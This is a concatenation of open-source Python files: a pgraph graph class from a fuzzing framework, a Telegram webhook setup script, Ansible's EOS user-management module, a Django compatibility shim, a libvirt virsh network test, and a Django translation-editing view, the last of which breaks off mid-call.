to_add = self.find_node("id", edge.dst)
if not down_graph.find_node("id", edge.dst):
next_level.append(to_add)
down_graph.add_node(copy.copy(to_add))
down_graph.add_edge(copy.copy(edge))
if next_level:
levels_to_process.append(next_level)
current_depth += 1
return down_graph
####################################################################################################################
def graph_intersect (self, other_graph):
'''
Remove all elements from the current graph that do not exist in the other graph.
@todo: Add support for clusters
@type other_graph: pgraph.graph
@param other_graph: Graph to intersect with
'''
for node in self.nodes.values():
if not other_graph.find_node("id", node.id):
self.del_node(node.id)
for edge in self.edges.values():
if not other_graph.find_edge("id", edge.id):
self.del_edge(edge.id)
return self
####################################################################################################################
def graph_proximity (self, center_node_id, max_depth_up=2, max_depth_down=2):
'''
Create a proximity graph centered around the specified node.
@type center_node_id: pgraph.node
@param center_node_id: Node to use as center of proximity graph
@type max_depth_up: Integer
@param max_depth_up: (Optional, Def=2) Number of upward levels to include in proximity graph
@type max_depth_down: Integer
@param max_depth_down: (Optional, Def=2) Number of downward levels to include in proximity graph
@rtype: pgraph.graph
@return: Proximity graph around specified node.
'''
prox_graph = self.graph_down(center_node_id, max_depth_down)
prox_graph.add_graph(self.graph_up(center_node_id, max_depth_up))
return prox_graph
####################################################################################################################
def graph_sub (self, other_graph):
'''
Remove the elements shared between the current graph and other graph from the current
graph.
@todo: Add support for clusters
@type other_graph: pgraph.graph
@param other_graph: Graph to diff/remove against
'''
for other_node in other_graph.nodes.values():
self.del_node(other_node.id)
for other_edge in other_graph.edges.values():
self.del_edge(None, other_edge.src, other_edge.dst)
return self
####################################################################################################################
def graph_up (self, from_node_id, max_depth=-1):
'''
Create a new graph, looking up, from the specified node id to the specified depth.
@type from_node_id: pgraph.node
@param from_node_id: Node to use as start of up graph
@type max_depth: Integer
@param max_depth: (Optional, Def=-1) Number of levels to include in up graph (-1 for infinite)
@rtype: pgraph.graph
@return: Up graph to the specified node.
'''
up_graph = graph()
from_node = self.find_node("id", from_node_id)
levels_to_process = []
current_depth = 1
levels_to_process.append([from_node])
for level in levels_to_process:
next_level = []
if current_depth > max_depth and max_depth != -1:
break
for node in level:
up_graph.add_node(copy.copy(node))
for edge in self.edges_to(node.id):
to_add = self.find_node("id", edge.src)
if not up_graph.find_node("id", edge.src):
next_level.append(to_add)
up_graph.add_node(copy.copy(to_add))
up_graph.add_edge(copy.copy(edge))
if next_level:
levels_to_process.append(next_level)
current_depth += 1
return up_graph
####################################################################################################################
def render_graph_gml (self):
'''
Render the GML graph description.
@rtype: String
@return: GML graph description.
'''
gml = 'Creator "pGRAPH - Pedram Amini <pedram.amini@gmail.com>"\n'
gml += 'directed 1\n'
# open the graph tag.
gml += 'graph [\n'
# add the nodes to the GML definition.
for node in self.nodes.values():
gml += node.render_node_gml(self)
# add the edges to the GML definition.
for edge in self.edges.values():
gml += edge.render_edge_gml(self)
# close the graph tag.
gml += ']\n'
"""
TODO: Complete cluster rendering
# if clusters exist.
if len(self.clusters):
# open the rootcluster tag.
gml += 'rootcluster [\n'
# add the clusters to the GML definition.
for cluster in self.clusters:
gml += cluster.render()
# add the clusterless nodes to the GML definition.
for node in self.nodes:
if not self.find_cluster_by_node("id", node.id):
gml += ' vertex "%d"\n' % node.id
# close the rootcluster tag.
gml += ']\n'
"""
return gml
####################################################################################################################
def render_graph_graphviz (self):
'''
Render the graphviz graph structure.
@rtype: pydot.Dot
@return: Pydot object representing entire graph
'''
import pydot
dot_graph = pydot.Dot()
for node in self.nodes.values():
dot_graph.add_node(node.render_node_graphviz(self))
for edge in self.edges.values():
dot_graph.add_edge(edge.render_edge_graphviz(self))
return dot_graph
####################################################################################################################
def render_graph_udraw (self):
'''
Render the uDraw graph description.
@rtype: String
@return: uDraw graph description.
'''
udraw = '['
# render each of the nodes in the graph.
# the individual nodes will handle their own edge rendering.
for node in self.nodes.values():
udraw += node.render_node_udraw(self)
udraw += ','
        # trim the extraneous comma and close the graph.
udraw = udraw[0:-1] + ']'
return udraw
####################################################################################################################
def render_graph_udraw_update (self):
'''
Render the uDraw graph update description.
@rtype: String
@return: uDraw graph description.
'''
udraw = '['
for node in self.nodes.values():
udraw += node.render_node_udraw_update()
udraw += ','
for edge in self.edges.values():
udraw += edge.render_edge_udraw_update()
udraw += ','
        # trim the extraneous comma and close the graph.
udraw = udraw[0:-1] + ']'
return udraw
####################################################################################################################
def update_node_id (self, current_id, new_id):
'''
Simply updating the id attribute of a node will sever the edges to / from the given node. This routine will
correctly update the edges as well.
@type current_id: Long
@param current_id: Current ID of node whose ID we want to update
@type new_id: Long
@param new_id: New ID to update to.
'''
if not self.nodes.has_key(current_id):
return
# update the node.
node = self.nodes[current_id]
del self.nodes[current_id]
node.id = new_id
self.nodes[node.id] = node
# update the edges.
for edge in [edge for edge in self.edges.values() if current_id in (edge.src, edge.dst)]:
del self.edges[edge.id]
if edge.src == current_id:
edge.src = new_id
if edge.dst == current_id:
edge.dst = new_id
edge.id = (edge.src << 32) + edge.dst
self.edges[edge.id] = edge
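    # Illustration (added note): edge ids encode endpoints as
    # (src << 32) + dst, so renaming node 1 to 5 rewrites an edge 1 -> 2
    # from id (1 << 32) + 2 to id (5 << 32) + 2, as the loop above does.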
####################################################################################################################
def sorted_nodes (self):
'''
Return a list of the nodes within the graph, sorted by id.
@rtype: List
@return: List of nodes, sorted by id.
'''
node_keys = self.nodes.keys()
node_keys.sort()
return [self.nodes[key] for key in node_keys]
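# Minimal usage sketch (added illustration, not part of the original file).
# It assumes pgraph's node.node(id) and edge.edge(src, dst) constructors;
# the edge id math matches the (src << 32) + dst convention used by
# del_edge() and update_node_id() above.
if __name__ == "__main__":
    g = graph()
    for node_id in (1, 2, 3):
        g.add_node(node.node(node_id))
    g.add_edge(edge.edge(1, 2))
    g.add_edge(edge.edge(2, 3))
    # graph_down() walks edges_from() level by level, so starting at node 1
    # with unlimited depth it should reach all three nodes.
    print len(g.graph_down(1).nodes)    # expected: 3
    # graph_up() walks edges_to(), so from node 3 it should also reach all
    # three nodes.
    print len(g.graph_up(3).nodes)      # expected: 3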
|
pmquang/FuzzLabs
|
modules/jobshandler/sulley/pgraph/graph.py
|
Python
|
gpl-2.0
| 21,677
|
import telepot
from keys import telegram_api_key, telegram_bot_url
bot = telepot.Bot(telegram_api_key)
bot.setWebhook(telegram_bot_url)
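# Added note: setWebhook() registers telegram_bot_url with the Telegram Bot
# API, so updates are delivered to that endpoint by HTTP POST instead of
# being fetched via long polling (getUpdates).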
|
timokoola/timoechobot
|
telegramsetup.py
|
Python
|
apache-2.0
| 136
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = """
---
module: eos_user
version_added: "2.3"
author: "Peter Sprygada (@privateip)"
short_description: Manage the collection of local users on EOS devices
description:
- This module provides declarative management of the local usernames
configured on Arista EOS devices. It allows playbooks to manage
either individual usernames or the collection of usernames in the
current running config. It also supports purging usernames from the
configuration that are not explicitly defined.
notes:
- This module requires connection to be network_cli
options:
users:
description:
- The set of username objects to be configured on the remote
Arista EOS device. The list entries can either be the username
or a hash of username and properties. This argument is mutually
exclusive with the C(username) argument.
required: false
default: null
username:
description:
- The username to be configured on the remote Arista EOS
        device. This argument accepts a string value and is mutually
exclusive with the C(users) argument.
required: false
default: null
update_password:
description:
- Since passwords are encrypted in the device running config, this
argument will instruct the module when to change the password. When
set to C(always), the password will always be updated in the device
and when set to C(on_create) the password will be updated only if
the username is created.
required: false
default: always
choices: ['on_create', 'always']
privilege:
description:
- The C(privilege) argument configures the privilege level of the
user when logged into the system. This argument accepts integer
values in the range of 1 to 15.
required: false
default: null
role:
description:
- The C(role) argument configures the role for the username in the
device running configuration. The argument accepts a string value
defining the role name. This argument does not check if the role
has been configured on the device.
required: false
default: null
sshkey:
description:
- The C(sshkey) argument defines the SSH public key to configure
for the username. This argument accepts a valid SSH key value.
required: false
default: null
nopassword:
description:
- The C(nopassword) argument defines the username without assigning
a password. This will allow the user to login to the system
without being authenticated by a password. This argument accepts
boolean values.
required: false
default: null
choices: ['true', 'false']
purge:
description:
- The C(purge) argument instructs the module to consider the
resource definition absolute. It will remove any previously
configured usernames on the device with the exception of the
`admin` user which cannot be deleted per EOS constraints.
required: false
default: false
state:
description:
      - The C(state) argument configures the state of the username definition
as it relates to the device operational configuration. When set
to I(present), the username(s) should be configured in the device active
configuration and when set to I(absent) the username(s) should not be
in the device active configuration
required: false
default: present
choices: ['present', 'absent']
"""
EXAMPLES = """
- name: create a new user
eos_user:
username: ansible
sshkey: "{{ lookup('file', '~/.ssh/id_rsa.pub') }}"
state: present
- name: remove all users except admin
eos_user:
purge: yes
- name: set multiple users to privilege level
  eos_user:
    users:
      - username: netop
      - username: netend
    privilege: 15
    state: present
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- username ansible secret password
- username admin secret admin
session_name:
description: The EOS config session name used to load the configuration
returned: when changed is True
type: str
sample: ansible_1479315771
start:
description: The time the job started
returned: always
type: str
sample: "2016-11-16 10:38:15.126146"
end:
description: The time the job ended
returned: always
type: str
sample: "2016-11-16 10:38:25.595612"
delta:
description: The time elapsed to perform all operations
returned: always
type: str
sample: "0:00:10.469466"
"""
import re
from functools import partial
from ansible.module_utils.local import LocalAnsibleModule
from ansible.module_utils.eos import get_config, load_config
from ansible.module_utils.six import iteritems
def validate_privilege(value, module):
if not 1 <= value <= 15:
module.fail_json(msg='privilege must be between 1 and 15, got %s' % value)
def map_obj_to_commands(updates, module):
commands = list()
state = module.params['state']
update_password = module.params['update_password']
for update in updates:
want, have = update
needs_update = lambda x: want.get(x) and (want.get(x) != have.get(x))
add = lambda x: commands.append('username %s %s' % (want['username'], x))
if want['state'] == 'absent':
commands.append('no username %s' % want['username'])
continue
if needs_update('role'):
add('role %s' % want['role'])
if needs_update('privilege'):
add('privilege %s' % want['privilege'])
if needs_update('password'):
if update_password == 'always' or not have:
add('secret %s' % want['password'])
if needs_update('sshkey'):
add('sshkey %s' % want['sshkey'])
if needs_update('nopassword'):
if want['nopassword']:
add('nopassword')
else:
add('no username %s nopassword' % want['username'])
return commands
def parse_role(data):
match = re.search(r'role (\S+)', data, re.M)
if match:
return match.group(1)
def parse_sshkey(data):
match = re.search(r'sshkey (.+)$', data, re.M)
if match:
return match.group(1)
def parse_privilege(data):
match = re.search(r'privilege (\S+)', data, re.M)
if match:
return int(match.group(1))
def map_config_to_obj(module):
data = get_config(module, flags=['section username'])
match = re.findall(r'^username (\S+)', data, re.M)
if not match:
return list()
instances = list()
for user in set(match):
        regex = r'username %s .+$' % user
        cfg = re.findall(regex, data, re.M)
cfg = '\n'.join(cfg)
obj = {
'username': user,
'state': 'present',
'nopassword': 'nopassword' in cfg,
'password': None,
'sshkey': parse_sshkey(cfg),
'privilege': parse_privilege(cfg),
'role': parse_role(cfg)
}
instances.append(obj)
return instances
def get_param_value(key, item, module):
# if key doesn't exist in the item, get it from module.params
if not item.get(key):
value = module.params[key]
# if key does exist, do a type check on it to validate it
else:
value_type = module.argument_spec[key].get('type', 'str')
type_checker = module._CHECK_ARGUMENT_TYPES_DISPATCHER[value_type]
type_checker(item[key])
value = item[key]
# validate the param value (if validator func exists)
validator = globals().get('validate_%s' % key)
if all((value, validator)):
validator(value, module)
return value
def map_params_to_obj(module):
users = module.params['users']
if not users:
if not module.params['username'] and module.params['purge']:
return list()
elif not module.params['username']:
module.fail_json(msg='username is required')
else:
collection = [{'username': module.params['username']}]
else:
collection = list()
for item in users:
if not isinstance(item, dict):
collection.append({'username': item})
elif 'username' not in item:
module.fail_json(msg='username is required')
else:
collection.append(item)
objects = list()
for item in collection:
get_value = partial(get_param_value, item=item, module=module)
item['password'] = get_value('password')
item['nopassword'] = get_value('nopassword')
item['privilege'] = get_value('privilege')
item['role'] = get_value('role')
item['sshkey'] = get_value('sshkey')
item['state'] = get_value('state')
objects.append(item)
return objects
def update_objects(want, have):
updates = list()
for entry in want:
item = next((i for i in have if i['username'] == entry['username']), None)
if all((item is None, entry['state'] == 'present')):
updates.append((entry, {}))
elif item:
for key, value in iteritems(entry):
if value and value != item[key]:
updates.append((entry, item))
return updates
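# Illustration (added note, not part of the original module): given
#   want = [{'username': 'netop', 'privilege': 15, 'state': 'present', ...}]
#   have = [{'username': 'netop', 'privilege': 1, ...}]
# update_objects() pairs the two dicts because 'privilege' differs, and
# map_obj_to_commands() then emits 'username netop privilege 15'.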
def main():
""" main entry point for module execution
"""
argument_spec = dict(
users=dict(type='list', no_log=True),
username=dict(),
password=dict(no_log=True),
nopassword=dict(type='bool'),
update_password=dict(default='always', choices=['on_create', 'always']),
privilege=dict(type='int'),
role=dict(),
sshkey=dict(),
purge=dict(type='bool', default=False),
state=dict(default='present', choices=['present', 'absent'])
)
mutually_exclusive = [('username', 'users')]
module = LocalAnsibleModule(argument_spec=argument_spec,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True)
result = {'changed': False}
want = map_params_to_obj(module)
have = map_config_to_obj(module)
commands = map_obj_to_commands(update_objects(want, have), module)
if module.params['purge']:
want_users = [x['username'] for x in want]
have_users = [x['username'] for x in have]
for item in set(have_users).difference(want_users):
if item != 'admin':
commands.append('no username %s' % item)
result['commands'] = commands
# the eos cli prevents this by rule so capture it and display
# a nice failure message
if 'no username admin' in commands:
module.fail_json(msg='cannot delete the `admin` account')
if commands:
commit = not module.check_mode
response = load_config(module, commands, commit=commit)
if response.get('diff') and module._diff:
result['diff'] = {'prepared': response.get('diff')}
result['session_name'] = response.get('session')
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
|
bmanojlovic/ansible
|
lib/ansible/modules/network/eos/eos_user.py
|
Python
|
gpl-3.0
| 11,924
|
import django
from functools import partial
from sys import version_info
from django.shortcuts import render
from django.template.loader import render_to_string
from django.template.response import TemplateResponse as BaseTemplateResponse
if django.VERSION < (1, 6):
from django.conf.urls.defaults import include, url
else:
from django.conf.urls import include, url
if django.VERSION < (2, 0):
from django.core.urlresolvers import reverse, NoReverseMatch
else:
from django.urls import reverse, NoReverseMatch
def patterns(*urls):
if django.VERSION < (1, 6):
from django.conf.urls.defaults import patterns
return patterns('', *urls)
elif django.VERSION < (1, 10):
from django.conf.urls import patterns
return patterns('', *urls)
return list(urls)
if django.VERSION >= (1, 9):
if django.VERSION < (2, 0):
from django.template.library import parse_bits
else:
def parse_bits(parser, bits, params, varargs, varkw, defaults,
takes_context, name):
from django.template import library
return library.parse_bits(
parser=parser, bits=bits, params=params, varargs=varargs,
varkw=varkw, defaults=defaults, kwonly=(), kwonly_defaults=(),
takes_context=takes_context, name=name)
def generic_tag_compiler(parser, token, params, varargs, varkw, defaults,
name, takes_context, node_class):
"""
Returns a template.Node subclass.
        This was inlined into django.template.library in Django 1.9; this here
        is a copy-paste replacement:
https://github.com/django/django/blob/stable/1.8.x/django/template/base.py#L1089
"""
bits = token.split_contents()[1:]
args, kwargs = parse_bits(parser, bits, params, varargs, varkw,
defaults, takes_context, name)
return node_class(takes_context, args, kwargs)
else:
from django.template.base import parse_bits
from django.template.base import generic_tag_compiler # noqa
if django.VERSION >= (1, 8):
# Always use the Django template engine on Django 1.8.
render_to_string = partial(render_to_string, using='django')
render = partial(render, using='django')
class TemplateResponse(BaseTemplateResponse):
def __init__(self, *args, **kwargs):
kwargs['using'] = 'django'
super(TemplateResponse, self).__init__(*args, **kwargs)
else:
TemplateResponse = BaseTemplateResponse
if django.VERSION < (1, 9):
from django.core.cache import get_cache
else:
from django.core.cache import caches
def get_cache(name):
return caches[name]
if version_info < (3,):
from inspect import getargspec
else:
from collections import namedtuple
from inspect import getfullargspec
ArgSpec = namedtuple('ArgSpec', ['args', 'varargs', 'keywords', 'defaults'])
def getargspec(func):
spec = getfullargspec(func)
return ArgSpec(
args=spec.args,
varargs=spec.varargs,
keywords=spec.varkw,
defaults=spec.defaults,
)
__all__ = ['render_to_string',
'render',
'patterns',
'include',
'url',
'reverse',
'NoReverseMatch',
'generic_tag_compiler',
'parse_bits',
'get_cache']
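# Usage sketch (added illustration, not part of the original file; running
# it requires Django to be importable, since this module imports django at
# the top). It shows that the getargspec shim above preserves the Python 2
# ArgSpec interface on Python 3, where inspect.getargspec was removed.
if __name__ == '__main__':
    def example(a, b=1, *args, **kwargs):
        pass
    spec = getargspec(example)
    print(spec.args)      # ['a', 'b']
    print(spec.keywords)  # 'kwargs'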
|
5monkeys/djedi-cms
|
djedi/compat.py
|
Python
|
bsd-3-clause
| 3,464
|
import os
from autotest.client.shared import error
from autotest.client.shared import utils
from virttest import virsh
from provider import libvirt_version
def run(test, params, env):
"""
Test command: virsh net-dumpxml.
This command can output the network information as an XML dump to stdout.
    1. Get all parameters from config file.
    2. If test case's network status is inactive, destroy it.
    3. Perform virsh net-dumpxml operation.
    4. Recover test environment (network status).
    5. Confirm the test result.
"""
status_error = params.get("status_error", "no")
net_ref = params.get("net_dumpxml_net_ref")
net_name = params.get("net_dumpxml_network", "default")
net_status = params.get("net_dumpxml_network_status", "active")
    xml_file = params.get("net_dumpxml_xml_file", "default.xml")
    extra = params.get("net_dumpxml_extra", "")
    network_xml = os.path.join(test.tmpdir, xml_file)
# acl polkit params
uri = params.get("virsh_uri")
unprivileged_user = params.get('unprivileged_user')
if unprivileged_user:
if unprivileged_user.count('EXAMPLE'):
unprivileged_user = 'testacl'
if not libvirt_version.version_compare(1, 1, 1):
if params.get('setup_libvirt_polkit') == 'yes':
raise error.TestNAError("API acl test not supported in current"
" libvirt version.")
# Run test case
if net_ref == "uuid":
net_ref = virsh.net_uuid(net_name).stdout.strip()
elif net_ref == "name":
net_ref = net_name
net_status_current = "active"
if not virsh.net_state_dict()[net_name]['active']:
net_status_current = "inactive"
if not virsh.net_state_dict()[net_name]['persistent']:
raise error.TestError("Network is transient!")
try:
if net_status == "inactive" and net_status_current == "active":
status_destroy = virsh.net_destroy(net_name,
ignore_status=True).exit_status
if status_destroy != 0:
raise error.TestError("Network destroied failed!")
virsh_dargs = {'ignore_status': True}
if params.get('setup_libvirt_polkit') == 'yes':
virsh_dargs['unprivileged_user'] = unprivileged_user
virsh_dargs['uri'] = uri
result = virsh.net_dumpxml(net_ref, extra, network_xml,
**virsh_dargs)
status = result.exit_status
err = result.stderr.strip()
xml_validate_cmd = "virt-xml-validate %s network" % network_xml
valid_s = utils.run(xml_validate_cmd, ignore_status=True).exit_status
# Check option valid or not.
if extra.find("--") != -1:
options = extra.split("--")
for option in options:
if option.strip() == "":
continue
if not virsh.has_command_help_match("net-dumpxml",
option.strip()) and\
status_error == "no":
raise error.TestNAError("The current libvirt version"
" doesn't support '%s' option"
% option.strip())
finally:
# Recover network
if net_status == "inactive" and net_status_current == "active":
status_start = virsh.net_start(net_name,
ignore_status=True).exit_status
if status_start != 0:
raise error.TestError("Network started failed!")
# Check status_error
if status_error == "yes":
if status == 0:
raise error.TestFail("Run successfully with wrong command!")
if err == "":
raise error.TestFail("The wrong command has no error outputed!")
elif status_error == "no":
if status != 0:
raise error.TestFail("Run failed with right command!")
if valid_s != 0:
raise error.TestFail("Command output is invalid!")
else:
raise error.TestError("The status_error must be 'yes' or 'no'!")
|
svirt/tp-libvirt
|
libvirt/tests/src/virsh_cmd/network/virsh_net_dumpxml.py
|
Python
|
gpl-2.0
| 4,174
|
from django.conf import settings
from django.contrib.auth.decorators import user_passes_test
from django.core.paginator import Paginator
from django.core.urlresolvers import reverse
from django.http import Http404, HttpResponseRedirect, HttpResponse
from django.shortcuts import render
from django.utils.encoding import iri_to_uri
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.cache import never_cache
from django.utils.encoding import force_text
from django.contrib import messages
from microsofttranslator import Translator, TranslateApiException
from autotranslate.conf import settings as autotranslate_settings
from polib import pofile
from autotranslate.poutil import find_pos, pagination_range, timestamp_with_timezone
from autotranslate.signals import entry_changed, post_save
from autotranslate.storage import get_storage
from autotranslate.access import can_translate, can_translate_language
import json
import re
import autotranslate
import unicodedata
import hashlib
import os
import six
@never_cache
@user_passes_test(lambda user: can_translate(user), settings.LOGIN_URL)
def home(request):
"""
Displays a list of messages to be translated
"""
def fix_nls(in_, out_):
"""Fixes submitted translations by filtering carriage returns and pairing
        newlines at the beginning and end of the translated string with the original
"""
if 0 == len(in_) or 0 == len(out_):
return out_
if "\r" in out_ and "\r" not in in_:
out_ = out_.replace("\r", '')
if "\n" == in_[0] and "\n" != out_[0]:
out_ = "\n" + out_
elif "\n" != in_[0] and "\n" == out_[0]:
out_ = out_.lstrip()
if 0 == len(out_):
pass
elif "\n" == in_[-1] and "\n" != out_[-1]:
out_ = out_ + "\n"
elif "\n" != in_[-1] and "\n" == out_[-1]:
out_ = out_.rstrip()
return out_
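    # Illustration (added note): fix_nls('\nfoo\n', 'bar') returns '\nbar\n',
    # mirroring the msgid's leading and trailing newlines, while any '\r'
    # absent from the msgid is stripped from the submitted translation.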
def _request_request(key, default=None):
if key in request.GET:
return request.GET.get(key)
elif key in request.POST:
return request.POST.get(key)
return default
storage = get_storage(request)
query = ''
if storage.has('autotranslate_i18n_fn'):
autotranslate_i18n_fn = storage.get('autotranslate_i18n_fn')
autotranslate_i18n_app = get_app_name(autotranslate_i18n_fn)
autotranslate_i18n_lang_code = storage.get('autotranslate_i18n_lang_code')
autotranslate_i18n_lang_bidi = autotranslate_i18n_lang_code.split('-')[0] in settings.LANGUAGES_BIDI
autotranslate_i18n_write = storage.get('autotranslate_i18n_write', True)
if autotranslate_i18n_write:
autotranslate_i18n_pofile = pofile(autotranslate_i18n_fn, wrapwidth=autotranslate_settings.POFILE_WRAP_WIDTH)
for entry in autotranslate_i18n_pofile:
entry.md5hash = hashlib.md5(
(six.text_type(entry.msgid) +
six.text_type(entry.msgstr) +
six.text_type(entry.msgctxt or "")).encode('utf8')
).hexdigest()
else:
autotranslate_i18n_pofile = storage.get('autotranslate_i18n_pofile')
if 'filter' in request.GET:
if request.GET.get('filter') in ('untranslated', 'translated', 'fuzzy', 'all'):
filter_ = request.GET.get('filter')
storage.set('autotranslate_i18n_filter', filter_)
return HttpResponseRedirect(reverse('autotranslate-home'))
autotranslate_i18n_filter = storage.get('autotranslate_i18n_filter', 'all')
if '_next' in request.POST:
rx = re.compile(r'^m_([0-9a-f]+)')
rx_plural = re.compile(r'^m_([0-9a-f]+)_([0-9]+)')
file_change = False
for key, value in request.POST.items():
md5hash = None
plural_id = None
if rx_plural.match(key):
md5hash = str(rx_plural.match(key).groups()[0])
# polib parses .po files into unicode strings, but
# doesn't bother to convert plural indexes to int,
# so we need unicode here.
plural_id = six.text_type(rx_plural.match(key).groups()[1])
# Above no longer true as of Polib 1.0.4
if plural_id and plural_id.isdigit():
plural_id = int(plural_id)
elif rx.match(key):
md5hash = str(rx.match(key).groups()[0])
if md5hash is not None:
entry = autotranslate_i18n_pofile.find(md5hash, 'md5hash')
# If someone did a makemessage, some entries might
# have been removed, so we need to check.
if entry:
old_msgstr = entry.msgstr
if plural_id is not None:
plural_string = fix_nls(entry.msgid_plural, value)
entry.msgstr_plural[plural_id] = plural_string
else:
entry.msgstr = fix_nls(entry.msgid, value)
is_fuzzy = bool(request.POST.get('f_%s' % md5hash, False))
old_fuzzy = 'fuzzy' in entry.flags
if old_fuzzy and not is_fuzzy:
entry.flags.remove('fuzzy')
elif not old_fuzzy and is_fuzzy:
entry.flags.append('fuzzy')
file_change = True
if old_msgstr != value or old_fuzzy != is_fuzzy:
entry_changed.send(sender=entry,
user=request.user,
old_msgstr=old_msgstr,
old_fuzzy=old_fuzzy,
pofile=autotranslate_i18n_fn,
language_code=autotranslate_i18n_lang_code,
)
else:
storage.set('autotranslate_last_save_error', True)
if file_change and autotranslate_i18n_write:
try:
autotranslate_i18n_pofile.metadata['Last-Translator'] = unicodedata.normalize('NFKD', u"%s %s <%s>" % (
getattr(request.user, 'first_name', 'Anonymous'),
getattr(request.user, 'last_name', 'User'),
getattr(request.user, 'email', 'anonymous@user.tld')
)).encode('ascii', 'ignore')
autotranslate_i18n_pofile.metadata['X-Translated-Using'] = u"dj-translate %s" % autotranslate.get_version(False)
autotranslate_i18n_pofile.metadata['PO-Revision-Date'] = timestamp_with_timezone()
except UnicodeDecodeError:
pass
try:
autotranslate_i18n_pofile.save()
po_filepath, ext = os.path.splitext(autotranslate_i18n_fn)
if autotranslate_settings.AUTO_COMPILE:
save_as_mo_filepath = po_filepath + '.mo'
autotranslate_i18n_pofile.save_as_mofile(save_as_mo_filepath)
post_save.send(sender=None, language_code=autotranslate_i18n_lang_code, request=request)
# Try auto-reloading via the WSGI daemon mode reload mechanism
if autotranslate_settings.WSGI_AUTO_RELOAD and \
'mod_wsgi.process_group' in request.environ and \
request.environ.get('mod_wsgi.process_group', None) and \
'SCRIPT_FILENAME' in request.environ and \
int(request.environ.get('mod_wsgi.script_reloading', '0')):
try:
os.utime(request.environ.get('SCRIPT_FILENAME'), None)
except OSError:
pass
# Try auto-reloading via uwsgi daemon reload mechanism
if autotranslate_settings.UWSGI_AUTO_RELOAD:
try:
import uwsgi
# pretty easy right?
uwsgi.reload()
except:
# we may not be running under uwsgi :P
pass
except Exception as e:
messages.error(request, e)
storage.set('autotranslate_i18n_write', False)
storage.set('autotranslate_i18n_pofile', autotranslate_i18n_pofile)
# Retain query arguments
query_arg = '?_next=1'
if _request_request('query', False):
query_arg += '&query=%s' % _request_request('query')
if 'page' in request.GET:
query_arg += '&page=%d&_next=1' % int(request.GET.get('page'))
return HttpResponseRedirect(reverse('autotranslate-home') + iri_to_uri(query_arg))
autotranslate_i18n_lang_code = storage.get('autotranslate_i18n_lang_code')
if _request_request('query', False) and _request_request('query', '').strip():
query = _request_request('query', '').strip()
rx = re.compile(re.escape(query), re.IGNORECASE)
paginator = Paginator([e_ for e_ in autotranslate_i18n_pofile if not e_.obsolete and rx.search(six.text_type(e_.msgstr) + six.text_type(e_.msgid) + u''.join([o[0] for o in e_.occurrences]))], autotranslate_settings.MESSAGES_PER_PAGE)
else:
if autotranslate_i18n_filter == 'untranslated':
paginator = Paginator(autotranslate_i18n_pofile.untranslated_entries(), autotranslate_settings.MESSAGES_PER_PAGE)
elif autotranslate_i18n_filter == 'translated':
paginator = Paginator(autotranslate_i18n_pofile.translated_entries(), autotranslate_settings.MESSAGES_PER_PAGE)
elif autotranslate_i18n_filter == 'fuzzy':
paginator = Paginator([e_ for e_ in autotranslate_i18n_pofile.fuzzy_entries() if not e_.obsolete], autotranslate_settings.MESSAGES_PER_PAGE)
else:
paginator = Paginator([e_ for e_ in autotranslate_i18n_pofile if not e_.obsolete], autotranslate_settings.MESSAGES_PER_PAGE)
if autotranslate_settings.ENABLE_REFLANG:
ref_lang = storage.get('autotranslate_i18n_ref_lang_code', 'msgid')
ref_pofile = None
if ref_lang != 'msgid':
ref_fn = re.sub('/locale/[a-z]{2}/', '/locale/%s/' % ref_lang, autotranslate_i18n_fn)
try:
ref_pofile = pofile(ref_fn)
except IOError:
# there's a syntax error in the PO file and polib can't open it. Let's just
# do nothing and thus display msgids.
pass
for o in paginator.object_list:
# default
o.ref_txt = o.msgid
if ref_pofile is not None:
ref_entry = ref_pofile.find(o.msgid)
if ref_entry is not None and ref_entry.msgstr:
o.ref_txt = ref_entry.msgstr
LANGUAGES = list(settings.LANGUAGES) + [('msgid', 'MSGID')]
else:
ref_lang = None
LANGUAGES = settings.LANGUAGES
page = 1
if 'page' in request.GET:
try:
get_page = int(request.GET.get('page'))
except ValueError:
page = 1 # fall back to page 1
else:
if 0 < get_page <= paginator.num_pages:
page = get_page
if '_next' in request.GET or '_next' in request.POST:
page += 1
if page > paginator.num_pages:
page = 1
query_arg = '?page=%d' % page
return HttpResponseRedirect(reverse('autotranslate-home') + iri_to_uri(query_arg))
autotranslate_messages = paginator.page(page).object_list
main_language = None
if autotranslate_settings.MAIN_LANGUAGE and autotranslate_settings.MAIN_LANGUAGE != autotranslate_i18n_lang_code:
for language in settings.LANGUAGES:
if language[0] == autotranslate_settings.MAIN_LANGUAGE:
main_language = _(language[1])
break
fl = ("/%s/" % autotranslate_settings.MAIN_LANGUAGE).join(autotranslate_i18n_fn.split("/%s/" % autotranslate_i18n_lang_code))
po = pofile(fl)
for message in autotranslate_messages:
message.main_lang = po.find(message.msgid).msgstr
needs_pagination = paginator.num_pages > 1
if needs_pagination:
if paginator.num_pages >= 10:
page_range = pagination_range(1, paginator.num_pages, page)
else:
page_range = range(1, 1 + paginator.num_pages)
try:
ADMIN_MEDIA_PREFIX = settings.ADMIN_MEDIA_PREFIX
ADMIN_IMAGE_DIR = ADMIN_MEDIA_PREFIX + 'img/admin/'
except AttributeError:
ADMIN_MEDIA_PREFIX = settings.STATIC_URL + 'admin/'
ADMIN_IMAGE_DIR = ADMIN_MEDIA_PREFIX + 'img/'
if storage.has('autotranslate_last_save_error'):
storage.delete('autotranslate_last_save_error')
autotranslate_last_save_error = True
else:
autotranslate_last_save_error = False
try:
autotranslate_i18n_lang_name = force_text(_(storage.get('autotranslate_i18n_lang_name')))
except:
autotranslate_i18n_lang_name = force_text(storage.get('autotranslate_i18n_lang_name'))
return render(request, 'autotranslate/pofile.html', dict(
version=autotranslate.get_version(True),
ADMIN_MEDIA_PREFIX=ADMIN_MEDIA_PREFIX,
ADMIN_IMAGE_DIR=ADMIN_IMAGE_DIR,
ENABLE_REFLANG=autotranslate_settings.ENABLE_REFLANG,
LANGUAGES=LANGUAGES,
